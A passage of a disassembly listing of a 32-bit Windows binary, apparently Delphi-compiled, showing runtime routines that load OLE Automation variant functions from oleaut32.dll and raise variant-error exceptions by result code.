mov edx, offset sub_4000CE34
mov eax, offset aVarand ; "VarAnd"
call sub_4000D260
pop ecx
mov ds:dword_4001F24C, eax
push ebp
mov edx, offset sub_4000CE34
mov eax, offset aVaror ; "VarOr"
call sub_4000D260
pop ecx
mov ds:dword_4001F250, eax
push ebp
mov edx, offset sub_4000CE34
mov eax, offset aVarxor ; "VarXor"
call sub_4000D260
pop ecx
mov ds:dword_4001F254, eax
push ebp
mov edx, offset sub_4000CE40
mov eax, offset aVarcmp ; "VarCmp"
call sub_4000D260
pop ecx
mov ds:dword_4001F258, eax
push ebp
mov edx, offset sub_4000CE4C
mov eax, offset aVari4fromstr ; "VarI4FromStr"
call sub_4000D260
pop ecx
mov ds:dword_4001F25C, eax
push ebp
mov edx, offset sub_4000CEB8
mov eax, offset aVarr4fromstr ; "VarR4FromStr"
call sub_4000D260
pop ecx
mov ds:dword_4001F260, eax
push ebp
mov edx, offset sub_4000CF24
mov eax, offset aVarr8fromstr ; "VarR8FromStr"
call sub_4000D260
pop ecx
mov ds:dword_4001F264, eax
push ebp
mov edx, offset sub_4000CF90
mov eax, offset aVardatefromstr ; "VarDateFromStr"
call sub_4000D260
pop ecx
mov ds:dword_4001F268, eax
push ebp
mov edx, offset sub_4000CFFC
mov eax, offset aVarcyfromstr ; "VarCyFromStr"
call sub_4000D260
pop ecx
mov ds:dword_4001F26C, eax
push ebp
mov edx, offset sub_4000D068
mov eax, offset aVarboolfromstr ; "VarBoolFromStr"
call sub_4000D260
pop ecx
mov ds:dword_4001F270, eax
push ebp
mov edx, offset sub_4000D0E8
mov eax, offset aVarbstrfromcy ; "VarBstrFromCy"
call sub_4000D260
pop ecx
mov ds:dword_4001F274, eax
push ebp
mov edx, offset sub_4000D158
mov eax, offset aVarbstrfromdat ; "VarBstrFromDate"
call sub_4000D260
pop ecx
mov ds:dword_4001F278, eax
push ebp
mov edx, offset sub_4000D1CC
mov eax, offset aVarbstrfromboo ; "VarBstrFromBool"
call sub_4000D260
pop ecx
mov ds:dword_4001F27C, eax
pop ecx
pop ebp
retn
sub_4000D28C endp
; ---------------------------------------------------------------------------
dword_4000D484 dd 61656C6Fh, 32337475h, 6C6C642Eh, 0aVariantchanget db 'VariantChangeTypeEx',0 ; DATA XREF: sub_4000D28C+17�o
aVarneg db 'VarNeg',0 ; DATA XREF: sub_4000D28C+2D�o
align 10h
aVarnot db 'VarNot',0 ; DATA XREF: sub_4000D28C+43�o
align 4
aVaradd db 'VarAdd',0 ; DATA XREF: sub_4000D28C+59�o
align 10h
aVarsub db 'VarSub',0 ; DATA XREF: sub_4000D28C+6F�o
align 4
aVarmul db 'VarMul',0 ; DATA XREF: sub_4000D28C+85�o
align 10h
aVardiv db 'VarDiv',0 ; DATA XREF: sub_4000D28C+9B�o
align 4
aVaridiv db 'VarIdiv',0 ; DATA XREF: sub_4000D28C+B1�o
aVarmod db 'VarMod',0 ; DATA XREF: sub_4000D28C+C7�o
align 4
aVarand db 'VarAnd',0 ; DATA XREF: sub_4000D28C+DD�o
align 10h
aVaror db 'VarOr',0 ; DATA XREF: sub_4000D28C+F3�o
align 4
aVarxor db 'VarXor',0 ; DATA XREF: sub_4000D28C+109�o
align 10h
aVarcmp db 'VarCmp',0 ; DATA XREF: sub_4000D28C+11F�o
align 4
aVari4fromstr db 'VarI4FromStr',0 ; DATA XREF: sub_4000D28C+135�o
align 4
aVarr4fromstr db 'VarR4FromStr',0 ; DATA XREF: sub_4000D28C+14B�o
align 4
aVarr8fromstr db 'VarR8FromStr',0 ; DATA XREF: sub_4000D28C+161�o
align 4
aVardatefromstr db 'VarDateFromStr',0 ; DATA XREF: sub_4000D28C+177�o
align 4
aVarcyfromstr db 'VarCyFromStr',0 ; DATA XREF: sub_4000D28C+18D�o
align 4
aVarboolfromstr db 'VarBoolFromStr',0 ; DATA XREF: sub_4000D28C+1A3�o
align 4
aVarbstrfromcy db 'VarBstrFromCy',0 ; DATA XREF: sub_4000D28C+1B9�o
align 4
aVarbstrfromdat db 'VarBstrFromDate',0 ; DATA XREF: sub_4000D28C+1CF�o
aVarbstrfromboo db 'VarBstrFromBool',0 ; DATA XREF: sub_4000D28C+1E5�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000D598 proc near ; DATA XREF: .text:40018378�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4000D5BD
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4001F280
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000D5C4
loc_4000D5BC: ; CODE XREF: sub_4000D598+2A�j
retn
; ---------------------------------------------------------------------------
loc_4000D5BD: ; DATA XREF: sub_4000D598+6�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000D5BC
; ---------------------------------------------------------------------------
loc_4000D5C4: ; CODE XREF: sub_4000D598:loc_4000D5BC�j
; DATA XREF: sub_4000D598+1F�o
pop ebp
retn
sub_4000D598 endp
; ---------------------------------------------------------------------------
db 8Bh, 0C0h
db 0CCh
; ---------------------------------------------------------------------------
loc_4000D5C9: ; DATA XREF: .text:off_4000D5EA�o
add dword ptr [esp+4], 0FFFFFFF8h
mov eax, [esp+4]
mov eax, [eax]
jmp dword ptr [eax]
; ---------------------------------------------------------------------------
loc_4000D5D6: ; DATA XREF: .text:4000D5EE�o
add dword ptr [esp+4], 0FFFFFFF8h
jmp loc_40012D58
; ---------------------------------------------------------------------------
loc_4000D5E0: ; DATA XREF: .text:4000D5F2�o
add dword ptr [esp+4], 0FFFFFFF8h
jmp loc_40012D64
; ---------------------------------------------------------------------------
off_4000D5EA dd offset loc_4000D5C9 ; DATA XREF: .text:4000D60A�o
dd offset loc_4000D5D6
dd offset loc_4000D5E0
word_4000D5F6 dw 1 ; DATA XREF: .text:4000D61C�o
dd 2 dup(0)
dd 0C00000h, 0
db 0, 46h
dd offset off_4000D5EA
dw 8
dd 0
align 8
dd offset off_4000D664
dd offset word_4000D5F6
dd 6 dup(0)
dd offset dword_4000D6A0
dd 0Ch
dd offset off_4000101C
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40012C6C
off_4000D664 dd offset sub_40012D70 ; DATA XREF: .text:4000D618�o
; .text:4000D6CC�o
dd offset sub_40012CFC
dd offset sub_40012D30
dd offset sub_40012D10
dd offset sub_40012D4C
dd offset sub_40012CF8
dd offset sub_40012B6C
dd offset sub_40012BA4
dd offset sub_40012C30
dd offset sub_400030B4
dd offset sub_400030B4
dd offset sub_40012B60
dd offset sub_40012D44
dd offset sub_40012BF8
dd offset sub_40012BEC
dword_4000D6A0 dd 75435412h, 6D6F7473h, 69726156h, 54746E61h, 90657079h
; DATA XREF: .text:4000D638�o
off_4000D6B4 dd offset dword_4000D6B8 ; DATA XREF: .text:40012AE5�o
dword_4000D6B8 dd 43541207h, 6F747375h, 7261566Dh, 746E6169h, 65707954h
; DATA XREF: .text:off_4000D6B4�o
dd offset off_4000D664
dd offset off_40001070
dd 56080000h, 61697261h, 73746Eh, 408D00h
off_4000D6E4 dd offset dword_4000D730 ; DATA XREF: sub_4000DC90+25�r
dd 7 dup(0)
dd offset dword_4000D730
dd 0Ch
dd offset off_400075AC
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000D730 dd 61564516h, 6E616972h, 766E4974h, 64696C61h, 7245704Fh
; DATA XREF: .text:off_4000D6E4�o
; .text:4000D704�o
dd 90726F72h
off_4000D748 dd offset dword_4000D794 ; DATA XREF: sub_4000DBA0+25�r
; sub_4000DBF4+65�r
dd 7 dup(0)
dd offset dword_4000D794
dd 0Ch
dd offset off_400075AC
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000D794 dd 61564515h, 6E616972h, 70795474h, 73614365h, 72724574h
; DATA XREF: .text:off_4000D748�o
; .text:4000D768�o
dd 0C08B726Fh
off_4000D7AC dd offset dword_4000D7F8 ; DATA XREF: sub_4000DCE4+65�r
; sub_4000DDD4+DB�r
dd 7 dup(0)
dd offset dword_4000D7F8
dd 0Ch
dd offset off_400075AC
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000D7F8 dd 61564515h, 6E616972h, 65764F74h, 6F6C6672h, 72724577h
; DATA XREF: .text:off_4000D7AC�o
; .text:4000D7CC�o
dd 0C08B726Fh
off_4000D810 dd offset dword_4000D85C ; DATA XREF: sub_4000DDD4+199�r
dd 7 dup(0)
dd offset dword_4000D85C
dd 0Ch
dd offset off_400075AC
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000D85C dd 61564517h, 6E616972h, 766E4974h, 64696C61h, 45677241h
; DATA XREF: .text:off_4000D810�o
; .text:4000D830�o
dd 726F7272h
off_4000D874 dd offset dword_4000D8C0 ; DATA XREF: sub_4000DDD4+AB�r
dd 7 dup(0)
dd offset dword_4000D8C0
dd 0Ch
dd offset off_400075AC
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000D8C0 dd 61564517h, 6E616972h, 64614274h, 54726156h, 45657079h
; DATA XREF: .text:off_4000D874�o
; .text:4000D894�o
dd 726F7272h
off_4000D8D8 dd offset dword_4000D924 ; DATA XREF: sub_4000DDD4+101�r
dd 7 dup(0)
dd offset dword_4000D924
dd 0Ch
dd offset off_400075AC
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000D924 dd 61564515h, 6E616972h, 64614274h, 65646E49h, 72724578h
; DATA XREF: .text:off_4000D8D8�o
; .text:4000D8F8�o
dd 0C08B726Fh
off_4000D93C dd offset dword_4000D988 ; DATA XREF: sub_4000DDD4+127�r
dd 7 dup(0)
dd offset dword_4000D988
dd 0Ch
dd offset off_400075AC
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000D988 dd 61564518h, 6E616972h, 72724174h, 6F4C7961h, 64656B63h
; DATA XREF: .text:off_4000D93C�o
; .text:4000D95C�o
dd 6F727245h, 408D72h
off_4000D9A4 dd offset dword_4000D9F0 ; DATA XREF: sub_4000DD80+25�r
dd 7 dup(0)
dd offset dword_4000D9F0
dd 0Ch
dd offset off_400075AC
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000D9F0 dd 61564518h, 6E616972h, 72724174h, 72437961h, 65746165h
; DATA XREF: .text:off_4000D9A4�o
; .text:4000D9C4�o
dd 6F727245h, 408D72h
off_4000DA0C dd offset dword_4000DA58 ; DATA XREF: sub_4000DDD4+14D�r
dd 7 dup(0)
dd offset dword_4000DA58
dd 0Ch
dd offset off_400075AC
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000DA58 dd 61564514h, 6E616972h, 746F4E74h, 6C706D49h, 6F727245h
; DATA XREF: .text:off_4000DA0C�o
; .text:4000DA2C�o
dd 408D72h
off_4000DA70 dd offset dword_4000DABC ; DATA XREF: sub_4000DDD4+173�r
dd 7 dup(0)
dd offset dword_4000DABC
dd 0Ch
dd offset off_400075AC
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000DABC dd 61564518h, 6E616972h, 74754F74h, 654D664Fh, 79726F6Dh
; DATA XREF: .text:off_4000DA70�o
; .text:4000DA90�o
dd 6F727245h, 408D72h
off_4000DAD8 dd offset dword_4000DB24 ; DATA XREF: sub_4000DDD4+1BC�r
dd 7 dup(0)
dd offset dword_4000DB24
dd 0Ch
dd offset off_400075AC
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000DB24 dd 61564517h, 6E616972h, 656E5574h, 63657078h, 45646574h
; DATA XREF: .text:off_4000DAD8�o
; .text:4000DAF8�o
dd 726F7272h
off_4000DB3C dd offset dword_4000DB88 ; DATA XREF: sub_4000E0EC+25�r
dd 7 dup(0)
dd offset dword_4000DB88
dd 0Ch
dd offset off_400075AC
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000DB88 dd 61564515h, 6E616972h, 73694474h, 63746170h, 72724568h
; DATA XREF: .text:off_4000DB3C�o
; .text:4000DB5C�o
dd 0C08B726Fh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000DBA0 proc near ; CODE XREF: sub_4000DDD4:loc_4000DE63�p
; sub_4000E744+33�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
xor eax, eax
push ebp
push offset loc_4000DBEA
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_4]
mov eax, off_4001AFD4
call sub_400062F0
mov ecx, [ebp+var_4]
mov dl, 1
mov eax, ds:off_4000D748
call sub_4000B030
call sub_400042E4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000DBF1
loc_4000DBE1: ; CODE XREF: sub_4000DBA0+4F�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000DBEA: ; DATA XREF: sub_4000DBA0+8�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000DBE1
; ---------------------------------------------------------------------------
loc_4000DBF1: ; CODE XREF: sub_4000DBA0+49�j
; DATA XREF: sub_4000DBA0+3C�o
pop ecx
pop ebp
retn
sub_4000DBA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000DBF4 proc near ; CODE XREF: sub_4000E034+1A�p
; sub_4000E8E0+74�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE4h
push ebx
push esi
xor ecx, ecx
mov [ebp+var_14], ecx
mov [ebp+var_18], ecx
mov [ebp+var_1C], ecx
mov esi, edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_4000DC83
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_14]
mov eax, ebx
call sub_4001293C
mov eax, [ebp+var_14]
mov [ebp+var_10], eax
mov [ebp+var_C], 0Bh
lea edx, [ebp+var_18]
mov eax, esi
call sub_4001293C
mov eax, [ebp+var_18]
mov [ebp+var_8], eax
mov [ebp+var_4], 0Bh
lea eax, [ebp+var_10]
push eax
push 1
lea edx, [ebp+var_1C]
mov eax, off_4001AEC0
call sub_400062F0
mov ecx, [ebp+var_1C]
mov dl, 1
mov eax, ds:off_4000D748
call sub_4000B06C
call sub_400042E4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000DC8A
loc_4000DC75: ; CODE XREF: sub_4000DBF4+94�j
lea eax, [ebp+var_1C]
mov edx, 3
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_4000DC83: ; DATA XREF: sub_4000DBF4+1A�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000DC75
; ---------------------------------------------------------------------------
loc_4000DC8A: ; CODE XREF: sub_4000DBF4+8E�j
; DATA XREF: sub_4000DBF4+7C�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000DBF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000DC90 proc near ; CODE XREF: sub_4000DDD4:loc_4000DE93�p
; sub_4000E35C+3A�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
xor eax, eax
push ebp
push offset loc_4000DCDA
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_4]
mov eax, off_4001AFB4
call sub_400062F0
mov ecx, [ebp+var_4]
mov dl, 1
mov eax, ds:off_4000D6E4
call sub_4000B030
call sub_400042E4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000DCE1
loc_4000DCD1: ; CODE XREF: sub_4000DC90+4F�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000DCDA: ; DATA XREF: sub_4000DC90+8�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000DCD1
; ---------------------------------------------------------------------------
loc_4000DCE1: ; CODE XREF: sub_4000DC90+49�j
; DATA XREF: sub_4000DC90+3C�o
pop ecx
pop ebp
retn
sub_4000DC90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000DCE4 proc near ; CODE XREF: sub_4000E034+25�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE4h
push ebx
push esi
xor ecx, ecx
mov [ebp+var_14], ecx
mov [ebp+var_18], ecx
mov [ebp+var_1C], ecx
mov esi, edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_4000DD73
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_14]
mov eax, ebx
call sub_4001293C
mov eax, [ebp+var_14]
mov [ebp+var_10], eax
mov [ebp+var_C], 0Bh
lea edx, [ebp+var_18]
mov eax, esi
call sub_4001293C
mov eax, [ebp+var_18]
mov [ebp+var_8], eax
mov [ebp+var_4], 0Bh
lea eax, [ebp+var_10]
push eax
push 1
lea edx, [ebp+var_1C]
mov eax, off_4001B014
call sub_400062F0
mov ecx, [ebp+var_1C]
mov dl, 1
mov eax, ds:off_4000D7AC
call sub_4000B06C
call sub_400042E4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000DD7A
loc_4000DD65: ; CODE XREF: sub_4000DCE4+94�j
lea eax, [ebp+var_1C]
mov edx, 3
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_4000DD73: ; DATA XREF: sub_4000DCE4+1A�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000DD65
; ---------------------------------------------------------------------------
loc_4000DD7A: ; CODE XREF: sub_4000DCE4+8E�j
; DATA XREF: sub_4000DCE4+7C�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000DCE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000DD80 proc near ; CODE XREF: sub_4000E480+F9�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
xor eax, eax
push ebp
push offset loc_4000DDCA
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_4]
mov eax, off_4001AF94
call sub_400062F0
mov ecx, [ebp+var_4]
mov dl, 1
mov eax, ds:off_4000D9A4
call sub_4000B030
call sub_400042E4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000DDD1
loc_4000DDC1: ; CODE XREF: sub_4000DD80+4F�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000DDCA: ; DATA XREF: sub_4000DD80+8�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000DDC1
; ---------------------------------------------------------------------------
loc_4000DDD1: ; CODE XREF: sub_4000DD80+49�j
; DATA XREF: sub_4000DD80+3C�o
pop ecx
pop ebp
retn
sub_4000DD80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000DDD4 proc near ; CODE XREF: sub_4000E028+4�p
; sub_4000E034:loc_4000E060�p
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov ecx, 8
loc_4000DDDC: ; CODE XREF: sub_4000DDD4+D�j
push 0
push 0
dec ecx
jnz short loc_4000DDDC
push ebx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_4000E019
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, ebx
cmp eax, 8002000Ah
jg short loc_4000DE36
jz loc_4000DE9D
cmp eax, 80020005h
jg short loc_4000DE27
jz short loc_4000DE63
sub eax, 80004001h
jz loc_4000DF0F
sub eax, 0BFFEh
jz loc_4000DF7E
jmp loc_4000DFA1
; ---------------------------------------------------------------------------
loc_4000DE27: ; CODE XREF: sub_4000DDD4+34�j
sub eax, 80020008h
jz short loc_4000DE6D
dec eax
jz short loc_4000DE93
jmp loc_4000DFA1
; ---------------------------------------------------------------------------
loc_4000DE36: ; CODE XREF: sub_4000DDD4+27�j
sub eax, 8002000Bh
jz loc_4000DEC3
sub eax, 2
jz loc_4000DEE9
sub eax, 50001h
jz loc_4000DF35
sub eax, 49h
jz loc_4000DF5B
jmp loc_4000DFA1
; ---------------------------------------------------------------------------
loc_4000DE63: ; CODE XREF: sub_4000DDD4+36�j
call sub_4000DBA0
jmp loc_4000DFF1
; ---------------------------------------------------------------------------
loc_4000DE6D: ; CODE XREF: sub_4000DDD4+58�j
lea edx, [ebp+var_4]
mov eax, off_4001B090
call sub_400062F0
mov ecx, [ebp+var_4]
mov dl, 1
mov eax, ds:off_4000D874
call sub_4000B030
call sub_400042E4
jmp loc_4000DFF1
; ---------------------------------------------------------------------------
loc_4000DE93: ; CODE XREF: sub_4000DDD4+5B�j
call sub_4000DC90
jmp loc_4000DFF1
; ---------------------------------------------------------------------------
loc_4000DE9D: ; CODE XREF: sub_4000DDD4+29�j
lea edx, [ebp+var_8]
mov eax, off_4001AF00
call sub_400062F0
mov ecx, [ebp+var_8]
mov dl, 1
mov eax, ds:off_4000D7AC
call sub_4000B030
call sub_400042E4
jmp loc_4000DFF1
; ---------------------------------------------------------------------------
loc_4000DEC3: ; CODE XREF: sub_4000DDD4+67�j
lea edx, [ebp+var_C]
mov eax, off_4001B050
call sub_400062F0
mov ecx, [ebp+var_C]
mov dl, 1
mov eax, ds:off_4000D8D8
call sub_4000B030
call sub_400042E4
jmp loc_4000DFF1
; ---------------------------------------------------------------------------
loc_4000DEE9: ; CODE XREF: sub_4000DDD4+70�j
lea edx, [ebp+var_10]
mov eax, off_4001B0C0
call sub_400062F0
mov ecx, [ebp+var_10]
mov dl, 1
mov eax, ds:off_4000D93C
call sub_4000B030
call sub_400042E4
jmp loc_4000DFF1
; ---------------------------------------------------------------------------
loc_4000DF0F: ; CODE XREF: sub_4000DDD4+3D�j
lea edx, [ebp+var_14]
mov eax, off_4001AFF4
call sub_400062F0
mov ecx, [ebp+var_14]
mov dl, 1
mov eax, ds:off_4000DA0C
call sub_4000B030
call sub_400042E4
jmp loc_4000DFF1
; ---------------------------------------------------------------------------
loc_4000DF35: ; CODE XREF: sub_4000DDD4+7B�j
lea edx, [ebp+var_18]
mov eax, off_4001AF2C
call sub_400062F0
mov ecx, [ebp+var_18]
mov dl, 1
mov eax, ds:off_4000DA70
call sub_4000B030
call sub_400042E4
jmp loc_4000DFF1
; ---------------------------------------------------------------------------
loc_4000DF5B: ; CODE XREF: sub_4000DDD4+84�j
lea edx, [ebp+var_1C]
mov eax, off_4001AF44
call sub_400062F0
mov ecx, [ebp+var_1C]
mov dl, 1
mov eax, ds:off_4000D810
call sub_4000B030
call sub_400042E4
jmp short loc_4000DFF1
; ---------------------------------------------------------------------------
loc_4000DF7E: ; CODE XREF: sub_4000DDD4+48�j
lea edx, [ebp+var_20]
mov eax, off_4001AEFC
call sub_400062F0
mov ecx, [ebp+var_20]
mov dl, 1
mov eax, ds:off_4000DAD8
call sub_4000B030
call sub_400042E4
jmp short loc_4000DFF1
; ---------------------------------------------------------------------------
loc_4000DFA1: ; CODE XREF: sub_4000DDD4+4E�j
; sub_4000DDD4+5D�j ...
mov eax, off_4001B09C
mov eax, [eax]
mov [ebp+var_38], eax
mov [ebp+var_34], 0Bh
mov [ebp+var_30], ebx
mov [ebp+var_2C], 0
lea edx, [ebp+var_3C]
mov eax, ebx
call sub_4000A81C
mov eax, [ebp+var_3C]
mov [ebp+var_28], eax
mov [ebp+var_24], 0Bh
lea eax, [ebp+var_38]
push eax
push 2
lea edx, [ebp+var_40]
mov eax, off_4001AF98
call sub_400062F0
mov ecx, [ebp+var_40]
mov dl, 1
mov eax, ds:off_400075AC
call sub_4000B06C
call sub_400042E4
loc_4000DFF1: ; CODE XREF: sub_4000DDD4+94�j
; sub_4000DDD4+BA�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000E020
loc_4000DFFE: ; CODE XREF: sub_4000DDD4+24A�j
lea eax, [ebp+var_40]
mov edx, 2
call sub_400048A8
lea eax, [ebp+var_20]
mov edx, 8
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_4000E019: ; DATA XREF: sub_4000DDD4+15�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000DFFE
; ---------------------------------------------------------------------------
loc_4000E020: ; CODE XREF: sub_4000DDD4+244�j
; DATA XREF: sub_4000DDD4+225�o
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000DDD4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000E028 proc near ; CODE XREF: sub_4000E1E0+23�p
; sub_4000E1E0+B4�p ...
test eax, eax
jz short locret_4000E031
call sub_4000DDD4
locret_4000E031: ; CODE XREF: sub_4000E028+2�j
retn
sub_4000E028 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000E034 proc near ; CODE XREF: sub_4000E068+23�p
; sub_4000E068+48�p ...
push ebx
test eax, eax
jz short loc_4000E065
mov ebx, eax
sub ebx, 80020005h
jz short loc_4000E04A
sub ebx, 5
jz short loc_4000E055
jmp short loc_4000E060
; ---------------------------------------------------------------------------
loc_4000E04A: ; CODE XREF: sub_4000E034+D�j
mov eax, edx
mov edx, ecx
call sub_4000DBF4
jmp short loc_4000E065
; ---------------------------------------------------------------------------
loc_4000E055: ; CODE XREF: sub_4000E034+12�j
mov eax, edx
mov edx, ecx
call sub_4000DCE4
jmp short loc_4000E065
; ---------------------------------------------------------------------------
loc_4000E060: ; CODE XREF: sub_4000E034+14�j
call sub_4000DDD4
loc_4000E065: ; CODE XREF: sub_4000E034+3�j
; sub_4000E034+1F�j ...
pop ebx
retn
sub_4000E034 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000E068 proc near ; CODE XREF: sub_4000ED90+430�p
; sub_4000F1E0+9D�p ...
push ebx
push esi
mov esi, edx
mov ebx, eax
call sub_40002CA4
mov edx, ds:off_400070C0
call sub_40003E74
test al, al
jz short loc_4000E093
mov ecx, esi
mov edx, ebx
mov eax, 8002000Ah
call sub_4000E034
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4000E093: ; CODE XREF: sub_4000E068+18�j
call sub_40002CA4
mov edx, ds:off_4000727C
call sub_40003E74
test al, al
jz short loc_4000E0B7
mov ecx, esi
mov edx, ebx
mov eax, 8002000Ah
call sub_4000E034
jmp short loc_4000E0E9
; ---------------------------------------------------------------------------
loc_4000E0B7: ; CODE XREF: sub_4000E068+3D�j
call sub_40002CA4
mov edx, ds:off_400073E4
call sub_40003E74
test al, al
jz short loc_4000E0DB
mov ecx, esi
mov edx, ebx
mov eax, 80020005h
call sub_4000E034
jmp short loc_4000E0E9
; ---------------------------------------------------------------------------
loc_4000E0DB: ; CODE XREF: sub_4000E068+61�j
call sub_40002CC4
mov edx, eax
mov eax, edx
call sub_400042E4
loc_4000E0E9: ; CODE XREF: sub_4000E068+4D�j
; sub_4000E068+71�j
pop esi
pop ebx
retn
sub_4000E068 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000E0EC proc near ; CODE XREF: sub_40012D28�p
; DATA XREF: sub_40019144+24�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
xor eax, eax
push ebp
push offset loc_4000E136
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_4]
mov eax, off_4001AEBC
call sub_400062F0
mov ecx, [ebp+var_4]
mov dl, 1
